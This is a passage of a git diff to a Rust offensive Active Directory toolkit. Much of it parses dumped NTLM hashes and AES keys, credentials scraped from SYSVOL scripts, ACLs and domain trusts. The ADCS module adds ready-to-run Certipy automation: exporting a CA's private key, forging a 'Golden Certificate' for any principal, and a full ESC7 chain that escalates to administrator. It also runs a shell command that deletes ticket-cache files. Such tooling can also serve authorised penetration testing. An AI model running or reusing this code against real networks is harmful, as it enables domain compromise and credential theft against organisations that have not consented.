Vec::with_capacity(clean.len() * 3 / 4); + let mut buf: u32 = 0; + let mut bits: u32 = 0; + + for ch in clean.chars() { + let val = match ch { + 'A'..='Z' => ch as u32 - 'A' as u32, + 'a'..='z' => ch as u32 - 'a' as u32 + 26, + '0'..='9' => ch as u32 - '0' as u32 + 52, + '+' => 62, + '/' => 63, + '=' => continue, // padding + _ => return Err("invalid base64 character"), + }; + buf = (buf << 6) | val; + bits += 6; + if bits >= 8 { + bits -= 8; + output.push((buf >> bits) as u8); + buf &= (1 << bits) - 1; + } + } + + Ok(output) +} + +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn parse_sid_wellknown() { + // S-1-5-18 (SYSTEM): revision=1, subauth_count=1, authority=5, subauth=18 + let bytes = [ + 0x01, // revision + 0x01, // sub authority count + 0x00, 0x00, 0x00, 0x00, 0x00, 0x05, // authority = 5 + 0x12, 0x00, 0x00, 0x00, // sub authority = 18 + ]; + let (sid, consumed) = parse_sid(&bytes, 0).unwrap(); + assert_eq!(sid, "S-1-5-18"); + assert_eq!(consumed, 12); + } + + #[test] + fn parse_sid_domain_user() { + // S-1-5-21-xxx-xxx-xxx-1001 + let bytes = [ + 0x01, // revision + 0x04, // sub authority count = 4 + 0x00, 0x00, 0x00, 0x00, 0x00, 0x05, // authority = 5 + 0x15, 0x00, 0x00, 0x00, // 21 + 0x01, 0x00, 0x00, 0x00, // 1 + 0x02, 0x00, 0x00, 0x00, // 2 + 0xE9, 0x03, 0x00, 0x00, // 1001 + ]; + let (sid, _) = parse_sid(&bytes, 0).unwrap(); + assert_eq!(sid, "S-1-5-21-1-2-1001"); + } + + #[test] + fn parse_guid_format() { + // A known GUID: 00299570-246d-11d0-a768-00aa006e0529 + let bytes = [ + 0x70, 0x95, 0x29, 0x00, // d1 = 0x00299570 LE + 0x6d, 0x24, // d2 = 0x246d LE + 0xd0, 0x11, // d3 = 0x11d0 LE + 0xa7, 0x68, 0x00, 0xaa, 0x00, 0x6e, 0x05, 0x29, // d4 + ]; + let guid = parse_guid(&bytes, 0).unwrap(); + assert_eq!(guid, "00299570-246d-11d0-a768-00aa006e0529"); + } + + #[test] + fn base64_decode_simple() { + let decoded = base64_decode("AQAAAA==").unwrap(); + assert_eq!(decoded, vec![0x01, 0x00, 0x00, 0x00]); + } + + #[test] + fn base64_decode_empty() { + let decoded = base64_decode("").unwrap(); + assert!(decoded.is_empty()); + } + + #[test] + fn classify_generic_all() { + let ace = ParsedAce { + trustee_sid: "S-1-5-21-1-2-1001".into(), + access_mask: GENERIC_ALL, + object_type_guid: None, + }; + let types = classify_ace(&ace); + assert_eq!(types, vec!["genericall"]); + } + + #[test] + fn classify_full_control() { + let ace = ParsedAce { + trustee_sid: "S-1-5-21-1-2-1001".into(), + access_mask: FULL_CONTROL, + object_type_guid: None, + }; + let types = classify_ace(&ace); + assert_eq!(types, vec!["genericall"]); + } + + #[test] + fn classify_write_dacl() { + let ace = ParsedAce { + trustee_sid: "S-1-5-21-1-2-1001".into(), + access_mask: WRITE_DACL, + object_type_guid: None, + }; + let types = classify_ace(&ace); + assert!(types.contains(&"writedacl")); + } + + #[test] + fn classify_write_owner() { + let ace = ParsedAce { + trustee_sid: "S-1-5-21-1-2-1001".into(), + access_mask: WRITE_OWNER, + object_type_guid: None, + }; + let types = classify_ace(&ace); + assert!(types.contains(&"writeowner")); + } + + #[test] + fn classify_force_change_password() { + let ace = ParsedAce { + trustee_sid: "S-1-5-21-1-2-1001".into(), + access_mask: ADS_RIGHT_DS_CONTROL_ACCESS, + object_type_guid: Some(GUID_FORCE_CHANGE_PASSWORD.into()), + }; + let types = classify_ace(&ace); + assert!(types.contains(&"forcechangepassword")); + } + + #[test] + fn classify_self_membership() { + let ace = ParsedAce { + trustee_sid: "S-1-5-21-1-2-1001".into(), + access_mask: ADS_RIGHT_DS_SELF, + object_type_guid: Some(GUID_SELF_MEMBERSHIP.into()), + }; + let types = classify_ace(&ace); + assert!(types.contains(&"self_membership")); + } + + #[test] + fn classify_generic_write() { + let ace = ParsedAce { + trustee_sid: "S-1-5-21-1-2-1001".into(), + access_mask: GENERIC_WRITE, + object_type_guid: None, + }; + let types = classify_ace(&ace); + assert!(types.contains(&"genericwrite")); + } + + #[test] + fn classify_no_dangerous_perms() { + let ace = ParsedAce { + trustee_sid: "S-1-5-21-1-2-1001".into(), + access_mask: 0x00000001, // just read + object_type_guid: None, + }; + let types = classify_ace(&ace); + assert!(types.is_empty()); + } + + #[test] + fn parse_security_descriptor_too_short() { + let result = parse_security_descriptor(&[0x01, 0x00]); + assert!(result.is_empty()); + } + + #[test] + fn well_known_sids() { + assert_eq!(well_known_sid("S-1-5-18"), Some("SYSTEM")); + assert_eq!(well_known_sid("S-1-1-0"), Some("Everyone")); + assert_eq!( + well_known_sid("S-1-5-32-544"), + Some("BUILTIN\\Administrators") + ); + assert_eq!(well_known_sid("S-1-5-21-custom"), None); + } + + #[test] + fn parse_acl_enumeration_empty() { + let vulns = parse_acl_enumeration("", &serde_json::json!({"domain": "contoso.local"})); + assert!(vulns.is_empty()); + } + + #[test] + fn parse_security_descriptor_minimal_valid() { + // Construct a minimal self-relative SD with DACL present, 0 ACEs + let mut sd = [0u8; 24]; + sd[0] = 1; // revision + // control: SE_DACL_PRESENT (0x0004) | SE_SELF_RELATIVE (0x8000) + sd[2] = 0x04; + sd[3] = 0x80; + // DACL offset at byte 16 (LE u32) + sd[16] = 20; // DACL starts at offset 20 + // DACL header at offset 20: revision=2, sbz=0, size=8, ace_count=0 + sd[20] = 2; // ACL revision + sd[22] = 8; // ACL size (just header) + sd[24..].iter().for_each(|_| {}); // pad isn't needed, we have exact size + + // Actually need 28 bytes total (20 for SD header + 8 for DACL header) + let mut sd = vec![0u8; 28]; + sd[0] = 1; + sd[2] = 0x04; + sd[3] = 0x80; + sd[16] = 20; + sd[20] = 2; + sd[22] = 8; + // ace_count at offset 24 = 0 + + let result = parse_security_descriptor(&sd); + assert!(result.is_empty()); + } +} diff --git a/ares-tools/src/parsers/secrets.rs b/ares-tools/src/parsers/secrets.rs index 4b5f2080..323db87a 100644 --- a/ares-tools/src/parsers/secrets.rs +++ b/ares-tools/src/parsers/secrets.rs @@ -2,6 +2,30 @@ use serde_json::{json, Value}; +/// Strip the `SMB ` framing that `nxc smb` prepends to every +/// line of pass-through output. If the line doesn't have the framing, return it +/// untouched. Needed because `forge_inter_realm_and_dump` shells out to +/// `nxc smb --ntds` instead of `impacket-secretsdump` (the latter's DRSUAPI +/// bind rejects cross-realm Kerberos credentials), so the secretsdump parser +/// has to handle nxc-framed lines too. +fn strip_nxc_framing(line: &str) -> &str { + let trimmed = line.trim_start(); + if !trimmed.starts_with("SMB ") && !trimmed.starts_with("SMB\t") { + return line; + } + // Walk through the first 4 whitespace-delimited tokens (SMB, IP, PORT, HOST) + // and return everything after the 4th token's trailing whitespace. + let mut rest = trimmed; + for _ in 0..4 { + rest = rest.trim_start(); + match rest.find(char::is_whitespace) { + Some(end) => rest = &rest[end..], + None => return line, + } + } + rest.trim_start() +} + pub fn parse_secretsdump(output: &str, params: &Value) -> (Vec, Vec) { // Prefer target_domain (the domain being dumped) over domain (auth credential's domain) // to correctly attribute hashes when authenticating cross-domain. @@ -14,8 +38,34 @@ pub fn parse_secretsdump(output: &str, params: &Value) -> (Vec, Vec" or + // "domain.local/user:aes256-cts-hmac-sha1-96:" + let mut aes_keys: std::collections::HashMap = std::collections::HashMap::new(); + for raw_line in output.lines() { + let line = strip_nxc_framing(raw_line).trim(); + if line.is_empty() || line.starts_with('[') { + continue; + } + if let Some(rest) = line.split_once(":aes256-cts-hmac-sha1-96:") { + let raw_user = rest.0; + let aes_hex = rest.1.trim(); + if aes_hex.is_empty() || !aes_hex.chars().all(|c| c.is_ascii_hexdigit()) { + continue; + } + let username = raw_user + .rsplit_once(['\\', '/']) + .map(|(_, u)| u) + .unwrap_or(raw_user) + .to_string(); + aes_keys.insert(username.to_lowercase(), aes_hex.to_lowercase()); + } + } + + for raw_line in output.lines() { + let line = strip_nxc_framing(raw_line).trim(); // NTLM hash format: "username:RID:LMhash:NThash:::" // or "DOMAIN\username:RID:LMhash:NThash:::" @@ -23,13 +73,14 @@ pub fn parse_secretsdump(output: &str, params: &Value) -> (Vec, Vec = line.split(':').collect(); if parts.len() >= 4 { let raw_user = parts[0]; - let (user_domain, username) = if raw_user.contains('\\') { - let split: Vec<&str> = raw_user.splitn(2, '\\').collect(); - let netbios = split[0]; - // Resolve NetBIOS domain prefix to FQDN using target_domain. - // e.g. "CONTOSO" → "contoso.local" when target_domain="contoso.local" - let resolved = resolve_netbios_to_fqdn(netbios, domain); - (resolved, split[1].to_string()) + let (user_domain, username) = if let Some(idx) = raw_user.find(['\\', '/']) { + let prefix = &raw_user[..idx]; + let user = &raw_user[idx + 1..]; + // Resolve NetBIOS prefix to FQDN using target_domain. + // raiseChild emits "domain.local/user" (slash + FQDN), + // standard secretsdump emits "DOMAIN\\user" (backslash + NetBIOS). + let resolved = resolve_netbios_to_fqdn(prefix, domain); + (resolved, user.to_string()) } else { (domain.to_string(), raw_user.to_string()) }; @@ -40,13 +91,17 @@ pub fn parse_secretsdump(output: &str, params: &Value) -> (Vec, Vec " prefix. + let output = "\ +SMB 192.168.58.10 445 DC01 [*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash) +SMB 192.168.58.10 445 DC01 contoso.local/krbtgt:502:aad3b435b51404eeaad3b435b51404ee:11111111111111111111111111111111::: +SMB 192.168.58.10 445 DC01 contoso.local/Administrator:500:aad3b435b51404eeaad3b435b51404ee:22222222222222222222222222222222::: +SMB 192.168.58.10 445 DC01 [+] Dumped 2 NTDS hashes"; + let params = json!({"target_domain": "contoso.local"}); + let (hashes, _) = parse_secretsdump(output, ¶ms); + assert_eq!(hashes.len(), 2); + assert_eq!(hashes[0]["username"], "krbtgt"); + assert_eq!(hashes[0]["domain"], "contoso.local"); + assert!(hashes[0]["hash_value"] + .as_str() + .unwrap() + .contains("11111111111111111111111111111111")); + assert_eq!(hashes[1]["username"], "Administrator"); + } + + #[test] + fn parse_secretsdump_strips_nxc_framing_with_aes_keys() { + // nxc-framed output should still let AES-key collection work. + let output = "\ +SMB 192.168.58.20 445 DC02 FABRIKAM\\CONTOSO$:1107:aad3b435b51404eeaad3b435b51404ee:33333333333333333333333333333333::: +SMB 192.168.58.20 445 DC02 FABRIKAM\\CONTOSO$:aes256-cts-hmac-sha1-96:4444444444444444444444444444444444444444444444444444444444444444"; + let params = json!({"target_domain": "fabrikam.local"}); + let (hashes, _) = parse_secretsdump(output, ¶ms); + assert_eq!(hashes.len(), 1); + assert_eq!(hashes[0]["username"], "CONTOSO$"); + assert_eq!( + hashes[0]["aes_key"], + "4444444444444444444444444444444444444444444444444444444444444444" + ); + } } diff --git a/ares-tools/src/parsers/spider.rs b/ares-tools/src/parsers/spider.rs index cdca3af4..e7232160 100644 --- a/ares-tools/src/parsers/spider.rs +++ b/ares-tools/src/parsers/spider.rs @@ -106,7 +106,7 @@ pub fn parse_spider_credentials(output: &str, params: &Value) -> Vec { .unwrap_or(domain); let username = &cap[2]; let password = &cap[3]; - if is_plausible_password(password) { + if is_plausible_password(password) && is_plausible_username(username) { creds.push(json!({ "username": username, "password": password, @@ -120,6 +120,7 @@ pub fn parse_spider_credentials(output: &str, params: &Value) -> Vec { let usernames: Vec = RE_USERNAME .captures_iter(content) .filter_map(|cap| first_capture(&cap, &[1, 2, 3])) + .filter(|u| is_plausible_username(u)) .collect(); let passwords: Vec = RE_PASSWORD @@ -157,6 +158,7 @@ pub fn parse_spider_credentials(output: &str, params: &Value) -> Vec { let ps_users: Vec = RE_PS_PARAM_USER .captures_iter(content) .filter_map(|cap| first_capture(&cap, &[1, 2, 3])) + .filter(|u| is_plausible_username(u)) .collect(); let ps_passes: Vec = RE_PS_PARAM_PASS @@ -201,7 +203,7 @@ pub fn parse_spider_credentials(output: &str, params: &Value) -> Vec { } /// Quick check that a value looks like a plausible password (not a variable ref, -/// not too short, not a common placeholder). +/// not a PowerShell cmdlet, not too short, not a common placeholder). fn is_plausible_password(s: &str) -> bool { if s.len() < 2 { return false; @@ -210,6 +212,11 @@ fn is_plausible_password(s: &str) -> bool { if s.starts_with('$') || s.starts_with('%') { return false; } + // Skip PowerShell cmdlets (Verb-Noun) like `New-Object`, `Get-Credential`. + // Captured when scripts assign cmdlet output to $password without quotes. + if PS_CMDLET_RE.is_match(s) { + return false; + } // Skip common placeholders let lower = s.to_lowercase(); !matches!( @@ -218,6 +225,30 @@ fn is_plausible_password(s: &str) -> bool { ) } +/// Quick check that a value looks like a plausible username (not a variable +/// reference, property access, or scriptblock fragment). +fn is_plausible_username(s: &str) -> bool { + if s.len() < 2 { + return false; + } + // PowerShell variable / property access: `$x`, `$x.y`, `$env:X` + if s.starts_with('$') || s.starts_with('%') { + return false; + } + // Reject anything containing characters that don't appear in real + // usernames but DO appear in scriptblock fragments / expressions. + if s.chars() + .any(|c| matches!(c, '(' | ')' | '{' | '}' | '"' | '\'' | ';' | ' ')) + { + return false; + } + true +} + +/// PowerShell cmdlet shape: `Verb-Noun` with TitleCase verb and noun. +static PS_CMDLET_RE: LazyLock = + LazyLock::new(|| Regex::new(r"^[A-Z][a-zA-Z]+-[A-Z][a-zA-Z]+$").unwrap()); + #[cfg(test)] mod tests { use super::*; @@ -314,6 +345,29 @@ $pass = "P@ssw0rd" assert!(creds.is_empty()); } + #[test] + fn rejects_powershell_expression_username_and_cmdlet_password() { + // Real-world false positive that produced + // `contoso.local\$user.username:New-Object` in loot. The username is a + // PowerShell property access expression, the "password" is a cmdlet + // name (Verb-Noun). Neither is a literal credential. + let output = r#" +--- SYSVOL/scripts/userInfo.ps1 --- +$user = $User.UserName +$password = New-Object PSCredential +"#; + let params = json!({"domain": "contoso.local"}); + let creds = parse_spider_credentials(output, ¶ms); + assert!( + creds.is_empty(), + "expected zero creds, got {:?}", + creds + .iter() + .map(|c| format!("{}:{}", c["username"], c["password"])) + .collect::>() + ); + } + // ── split_domain_user ───────────────────────────────────────── #[test] diff --git a/ares-tools/src/parsers/trust.rs b/ares-tools/src/parsers/trust.rs index 8eb523b0..f2e52a9a 100644 --- a/ares-tools/src/parsers/trust.rs +++ b/ares-tools/src/parsers/trust.rs @@ -11,8 +11,10 @@ const TRUST_DIRECTION_BIDIRECTIONAL: u32 = 3; const TRUST_TYPE_PARENT_CHILD: u32 = 1; // same forest const TRUST_TYPE_TREE_ROOT: u32 = 2; // tree root (also intra-forest) -/// LDAP trustAttributes (MS-ADTS 6.1.6.7.9) flag for forest transitive trust. +/// LDAP trustAttributes (MS-ADTS 6.1.6.7.9) flags. const TRUST_ATTR_FOREST_TRANSITIVE: u32 = 0x00000008; +const TRUST_ATTR_WITHIN_FOREST: u32 = 0x00000020; +const TRUST_ATTR_QUARANTINED_DOMAIN: u32 = 0x00000004; /// Parse `enumerate_domain_trusts` ldapsearch output into TrustInfo-compatible JSON values. /// @@ -46,8 +48,15 @@ pub fn parse_domain_trusts(output: &str) -> Vec { let classified_type = classify_trust_type(trust_type, trust_attributes, cn); - let sid_filtering = - trust_attributes & TRUST_ATTR_FOREST_TRANSITIVE != 0 || classified_type == "forest"; + // SID filtering is on by default for both forest and external trusts in + // modern AD (Server 2003+). Explicit attribute flags override the default, + // but absent the flag we still treat cross-forest/external trusts as + // filtered — mirrors `netdom trust /SidFiltering` which defaults to "yes" + // and blocks ExtraSid claims with RID < 1000. + let sid_filtering = trust_attributes & TRUST_ATTR_FOREST_TRANSITIVE != 0 + || trust_attributes & TRUST_ATTR_QUARANTINED_DOMAIN != 0 + || classified_type == "forest" + || classified_type == "external"; Some(json!({ "domain": cn.to_lowercase(), @@ -111,12 +120,27 @@ pub fn parse_domain_trusts(output: &str) -> Vec { } /// Classify trust type from LDAP trustType and trustAttributes values. +/// +/// trustAttributes is the authoritative signal: +/// - WITHIN_FOREST (0x20) → intra-forest (parent_child or tree_root) +/// - FOREST_TRANSITIVE (0x08) → cross-forest +/// - QUARANTINED_DOMAIN (0x04) → external (with SID filtering) +/// +/// trustType is largely informational in modern AD (almost always 2 = uplevel). +/// Fall back to cn-label heuristics only when attributes are missing. fn classify_trust_type(trust_type: u32, trust_attributes: u32, cn: &str) -> String { - // Forest transitive flag → cross-forest trust + // Authoritative attribute checks first. + if trust_attributes & TRUST_ATTR_WITHIN_FOREST != 0 { + return "parent_child".to_string(); + } if trust_attributes & TRUST_ATTR_FOREST_TRANSITIVE != 0 { return "forest".to_string(); } + if trust_attributes & TRUST_ATTR_QUARANTINED_DOMAIN != 0 { + return "external".to_string(); + } + // Fall back to legacy trustType-based heuristics. match trust_type { TRUST_TYPE_PARENT_CHILD => "parent_child".to_string(), TRUST_TYPE_TREE_ROOT => { @@ -221,7 +245,8 @@ flatName: CHILD assert_eq!(trusts.len(), 1); assert_eq!(trusts[0]["direction"], "outbound"); assert_eq!(trusts[0]["trust_type"], "external"); - assert!(!trusts[0]["sid_filtering"].as_bool().unwrap()); + // External trusts have SID filtering on by default in modern AD. + assert!(trusts[0]["sid_filtering"].as_bool().unwrap()); } #[test] @@ -250,6 +275,30 @@ flatName: CHILD assert_eq!(trusts[0]["trust_type"], "parent_child"); } + #[test] + fn parse_trust_within_forest_from_child_view() { + // When enumerating from child looking up to parent, cn is short + // ("contoso.local") but trustAttributes has WITHIN_FOREST (0x20). + // The attribute is authoritative and should yield parent_child. + let output = + "cn: contoso.local\ntrustDirection: 3\ntrustType: 2\ntrustAttributes: 32\nflatName: CONTOSO\n"; + let trusts = parse_domain_trusts(output); + assert_eq!(trusts.len(), 1); + assert_eq!(trusts[0]["trust_type"], "parent_child"); + assert!(!trusts[0]["sid_filtering"].as_bool().unwrap()); + } + + #[test] + fn parse_trust_quarantined_external() { + // QUARANTINED_DOMAIN (0x04) → external trust with SID filtering. + let output = + "cn: partner.com\ntrustDirection: 3\ntrustType: 2\ntrustAttributes: 4\nflatName: PARTNER\n"; + let trusts = parse_domain_trusts(output); + assert_eq!(trusts.len(), 1); + assert_eq!(trusts[0]["trust_type"], "external"); + assert!(trusts[0]["sid_filtering"].as_bool().unwrap()); + } + #[test] fn parse_trust_domain_lowercased() { let output = "cn: FABRIKAM.LOCAL\ntrustDirection: 3\ntrustType: 2\ntrustAttributes: 8\nflatName: FABRIKAM\n"; diff --git a/ares-tools/src/privesc/adcs.rs b/ares-tools/src/privesc/adcs.rs index 9e7c358e..1ad94a69 100644 --- a/ares-tools/src/privesc/adcs.rs +++ b/ares-tools/src/privesc/adcs.rs @@ -9,33 +9,41 @@ use crate::ToolOutput; /// Enumerate ADCS certificate templates and CAs using Certipy. /// -/// Required args: `username`, `domain`, `password`, `dc_ip` -/// Optional args: `vulnerable` +/// Required args: `username`, `domain`, `dc_ip` +/// Optional args: `password`, `hashes`, `vulnerable` pub async fn certipy_find(args: &Value) -> Result { let username = required_str(args, "username")?; let domain = required_str(args, "domain")?; - let password = required_str(args, "password")?; let dc_ip = required_str(args, "dc_ip")?; - let vulnerable = optional_bool(args, "vulnerable").unwrap_or(false); + let vulnerable = optional_bool(args, "vulnerable").unwrap_or(true); + let hashes = optional_str(args, "hashes"); let user_at_domain = format!("{username}@{domain}"); - CommandBuilder::new("certipy") + let mut cmd = CommandBuilder::new("certipy") .arg("find") - .flag("-u", user_at_domain) - .flag("-p", password) + .flag("-u", &user_at_domain) .flag("-dc-ip", dc_ip) .arg("-text") + .arg("-stdout") .arg_if(vulnerable, "-vulnerable") - .timeout_secs(120) - .execute() - .await + .timeout_secs(120); + + if let Some(h) = hashes { + cmd = cmd.flag("-hashes", h); + } else { + let password = required_str(args, "password")?; + cmd = cmd.flag("-p", password); + } + + cmd.execute().await } /// Request a certificate from an ADCS CA using Certipy. /// /// Required args: `username`, `domain`, `password`, `ca`, `template`, `dc_ip` -/// Optional args: `upn` +/// Optional args: `upn`, `target` (CA server IP/hostname — use when CA is not on the DC), +/// `sid` (SID to embed in cert), `out` (output PFX filename) pub async fn certipy_request(args: &Value) -> Result { let username = required_str(args, "username")?; let domain = required_str(args, "domain")?; @@ -44,6 +52,24 @@ pub async fn certipy_request(args: &Value) -> Result { let template = required_str(args, "template")?; let dc_ip = required_str(args, "dc_ip")?; let upn = optional_str(args, "upn"); + let sid = optional_str(args, "sid"); + let target = optional_str(args, "target") + .or_else(|| optional_str(args, "ca_host")) + .or_else(|| optional_str(args, "target_ip")); + let application_policies = optional_str(args, "application_policies"); + + // Generate a unique output filename to avoid certipy's interactive overwrite + // prompt which kills non-interactive runs. Use template + epoch millis. + let out = match optional_str(args, "out") { + Some(o) => o.to_string(), + None => { + let ts = std::time::SystemTime::now() + .duration_since(std::time::UNIX_EPOCH) + .map(|d| d.as_millis()) + .unwrap_or(0); + format!("cert_{template}_{ts}") + } + }; let user_at_domain = format!("{username}@{domain}"); @@ -54,7 +80,11 @@ pub async fn certipy_request(args: &Value) -> Result { .flag("-ca", ca) .flag("-template", template) .flag("-dc-ip", dc_ip) + .flag("-out", out) + .flag_opt("-target", target) .flag_opt("-upn", upn) + .flag_opt("-sid", sid) + .flag_opt("-application-policies", application_policies) .timeout_secs(120) .execute() .await @@ -68,6 +98,15 @@ pub async fn certipy_auth(args: &Value) -> Result { let dc_ip = required_str(args, "dc_ip")?; let domain = required_str(args, "domain")?; + // Certipy auth writes .ccache based on cert subject (e.g. administrator.ccache) + // and does NOT support -out. Remove existing .ccache files to prevent the + // interactive "Overwrite? (y/n)" prompt that kills non-interactive runs. + let _ = tokio::process::Command::new("sh") + .arg("-c") + .arg("rm -f *.ccache 2>/dev/null") + .output() + .await; + CommandBuilder::new("certipy") .arg("auth") .flag("-pfx", pfx_path) @@ -90,6 +129,27 @@ pub async fn certipy_shadow(args: &Value) -> Result { let user_at_domain = format!("{username}@{domain}"); + // Generate unique output name to avoid interactive overwrite prompt + let out = match optional_str(args, "out") { + Some(o) => o.to_string(), + None => { + let ts = std::time::SystemTime::now() + .duration_since(std::time::UNIX_EPOCH) + .map(|d| d.as_millis()) + .unwrap_or(0); + format!("shadow_{target}_{ts}") + } + }; + + // certipy shadow auto internally calls certipy auth which writes .ccache + // based on the target account name. Remove existing .ccache to prevent the + // interactive "Overwrite? (y/n)" prompt. + let _ = tokio::process::Command::new("sh") + .arg("-c") + .arg("rm -f *.ccache 2>/dev/null") + .output() + .await; + CommandBuilder::new("certipy") .arg("shadow") .arg("auto") @@ -97,11 +157,350 @@ pub async fn certipy_shadow(args: &Value) -> Result { .flag("-password", password) .flag("-account", target) .flag("-dc-ip", dc_ip) + .flag("-out", out) .timeout_secs(120) .execute() .await } +/// Certipy CA management operations (add-officer, issue-request, backup). +/// +/// Required args: `username`, `domain`, `password`, `dc_ip`, `ca` +/// Required: exactly one of: +/// - `add_officer` (bool, true) +/// - `issue_request` (integer request ID) +/// - `backup` (bool, true) — exports the CA private key to `.pfx` in CWD. +/// Requires SYSTEM-equivalent access on the CA host (e.g., the calling +/// process is running on a host where `username` is local administrator). +pub async fn certipy_ca(args: &Value) -> Result { + let username = required_str(args, "username")?; + let domain = required_str(args, "domain")?; + let password = required_str(args, "password")?; + let dc_ip = required_str(args, "dc_ip")?; + let ca = required_str(args, "ca")?; + + let user_at_domain = format!("{username}@{domain}"); + + let add_officer = optional_bool(args, "add_officer").unwrap_or(false); + let backup = optional_bool(args, "backup").unwrap_or(false); + let issue_request = args + .get("issue_request") + .and_then(|v| v.as_i64()) + .map(|v| v as i32); + + let mut cmd = CommandBuilder::new("certipy") + .arg("ca") + .flag("-username", user_at_domain) + .flag("-password", password) + .flag("-dc-ip", dc_ip) + .flag("-ca", ca) + .timeout_secs(180); + + if add_officer { + cmd = cmd.flag("-add-officer", format!("{username}@{domain}")); + } + if let Some(req_id) = issue_request { + cmd = cmd.flag("-issue-request", req_id.to_string()); + } + if backup { + cmd = cmd.arg("-backup"); + } + + cmd.execute().await +} + +/// Forge a "Golden Certificate" from a stolen CA PFX (the `-backup` output of +/// `certipy_ca`). Produces a client PFX that authenticates as `upn` on the CA's +/// domain — the universal terminal node for ADCS compromise: any path that +/// gets SYSTEM on a CA host can chain `certipy_ca backup` → this tool → +/// `certipy_auth` to obtain a TGT/NT hash for any principal in the domain. +/// +/// Required args: `ca_pfx` (path to stolen CA PFX), `upn` (target principal, +/// e.g. `administrator@essos.local`) +/// Optional args: `subject`, `template`, `out` (output PFX path) +pub async fn certipy_forge(args: &Value) -> Result { + let ca_pfx = required_str(args, "ca_pfx")?; + let upn = required_str(args, "upn")?; + let subject = optional_str(args, "subject"); + let template = optional_str(args, "template"); + + let out = match optional_str(args, "out") { + Some(o) => o.to_string(), + None => { + let ts = std::time::SystemTime::now() + .duration_since(std::time::UNIX_EPOCH) + .map(|d| d.as_millis()) + .unwrap_or(0); + let safe_upn = upn.replace(['/', '\\', ' '], "_"); + format!("forged_{safe_upn}_{ts}.pfx") + } + }; + + CommandBuilder::new("certipy") + .arg("forge") + .flag("-ca-pfx", ca_pfx) + .flag("-upn", upn) + .flag_opt("-subject", subject) + .flag_opt("-template", template) + .flag("-out", out) + .timeout_secs(60) + .execute() + .await +} + +/// Retrieve a previously issued certificate by request ID. +/// +/// Required args: `username`, `domain`, `password`, `dc_ip`, `ca`, +/// `request_id` +/// Optional args: `target` (CA server IP) +pub async fn certipy_retrieve(args: &Value) -> Result { + let username = required_str(args, "username")?; + let domain = required_str(args, "domain")?; + let password = required_str(args, "password")?; + let dc_ip = required_str(args, "dc_ip")?; + let ca = required_str(args, "ca")?; + let request_id = + args.get("request_id") + .and_then(|v| v.as_i64()) + .ok_or_else(|| anyhow::anyhow!("missing required arg: request_id"))? as i32; + let target = optional_str(args, "target") + .or_else(|| optional_str(args, "ca_host")) + .or_else(|| optional_str(args, "target_ip")); + + let user_at_domain = format!("{username}@{domain}"); + + let ts = std::time::SystemTime::now() + .duration_since(std::time::UNIX_EPOCH) + .map(|d| d.as_millis()) + .unwrap_or(0); + let out = format!("cert_retrieve_{request_id}_{ts}"); + + CommandBuilder::new("certipy") + .arg("req") + .flag("-username", user_at_domain) + .flag("-password", password) + .flag("-ca", ca) + .flag("-retrieve", request_id.to_string()) + .flag("-dc-ip", dc_ip) + .flag("-out", out) + .flag_opt("-target", target) + .timeout_secs(120) + .execute() + .await +} + +/// Run the full ESC7 exploitation chain: add officer → request SubCA cert +/// (gets denied) → issue the pending request → retrieve cert → authenticate. +/// +/// Required args: `username`, `domain`, `password`, `dc_ip`, `ca` +/// Optional args: `target` (CA server IP), `upn`, `sid` +pub async fn certipy_esc7_full_chain(args: &Value) -> Result { + let username = required_str(args, "username")?; + let domain = required_str(args, "domain")?; + let password = required_str(args, "password")?; + let dc_ip = required_str(args, "dc_ip")?; + let ca = required_str(args, "ca")?; + let upn = optional_str(args, "upn") + .unwrap_or("administrator") + .to_string(); + let target = optional_str(args, "target") + .or_else(|| optional_str(args, "ca_host")) + .or_else(|| optional_str(args, "target_ip")); + let sid = optional_str(args, "sid"); + + let upn_full = if upn.contains('@') { + upn.clone() + } else { + format!("{upn}@{domain}") + }; + + let user_at_domain = format!("{username}@{domain}"); + let mut outputs = Vec::new(); + + // Step 1: Add self as CA officer (certipy v5 requires principal as arg) + let mut step1_cmd = CommandBuilder::new("certipy") + .arg("ca") + .flag("-username", &user_at_domain) + .flag("-password", password) + .flag("-dc-ip", dc_ip) + .flag("-ca", ca) + .flag("-add-officer", username); + if let Some(t) = &target { + step1_cmd = step1_cmd.flag("-target", *t); + } + let step1 = step1_cmd.timeout_secs(120).execute().await?; + outputs.push(("Add Officer", step1)); + + // Step 2: Request cert with SubCA template (will be denied/pending) + let ts = std::time::SystemTime::now() + .duration_since(std::time::UNIX_EPOCH) + .map(|d| d.as_millis()) + .unwrap_or(0); + let out_name = format!("cert_esc7_{ts}"); + + let mut req_cmd = CommandBuilder::new("certipy") + .arg("req") + .flag("-username", &user_at_domain) + .flag("-password", password) + .flag("-ca", ca) + .flag("-template", "SubCA") + .flag("-upn", &upn_full) + .flag("-dc-ip", dc_ip) + .flag("-out", &out_name); + if let Some(t) = &target { + req_cmd = req_cmd.flag("-target", *t); + } + if let Some(s) = &sid { + req_cmd = req_cmd.flag("-sid", *s); + } + // Certipy asks "Would you like to save the private key? (y/N)" when the + // SubCA request is denied — we need to answer "y" to keep the key for later. + let step2 = req_cmd.stdin("y\n").timeout_secs(120).execute().await?; + + // Parse the request ID from certipy output (e.g., "Request ID is 42") + let request_id = step2 + .stdout + .lines() + .chain(step2.stderr.lines()) + .find_map(|line| { + let lower = line.to_lowercase(); + if lower.contains("request id") { + line.split_whitespace() + .filter_map(|w| w.trim_end_matches('.').parse::().ok()) + .next_back() + } else { + None + } + }); + outputs.push(("Request SubCA", step2)); + + let req_id = match request_id { + Some(id) => id, + None => { + let combined = outputs + .iter() + .map(|(name, o)| format!("=== {name} ===\n{}\n{}", o.stdout, o.stderr)) + .collect::>() + .join("\n"); + return Ok(ToolOutput { + stdout: combined, + stderr: "ERROR: Could not parse request ID from certipy output".into(), + exit_code: Some(1), + success: false, + }); + } + }; + + // Step 3: Issue the pending request using ManageCA rights + let mut step3_cmd = CommandBuilder::new("certipy") + .arg("ca") + .flag("-username", &user_at_domain) + .flag("-password", password) + .flag("-dc-ip", dc_ip) + .flag("-ca", ca) + .flag("-issue-request", req_id.to_string()); + if let Some(t) = &target { + step3_cmd = step3_cmd.flag("-target", *t); + } + let step3 = step3_cmd.timeout_secs(120).execute().await?; + outputs.push(("Issue Request", step3)); + + // Step 4: Retrieve the issued certificate + let step4 = CommandBuilder::new("certipy") + .arg("req") + .flag("-username", &user_at_domain) + .flag("-password", password) + .flag("-ca", ca) + .flag("-retrieve", req_id.to_string()) + 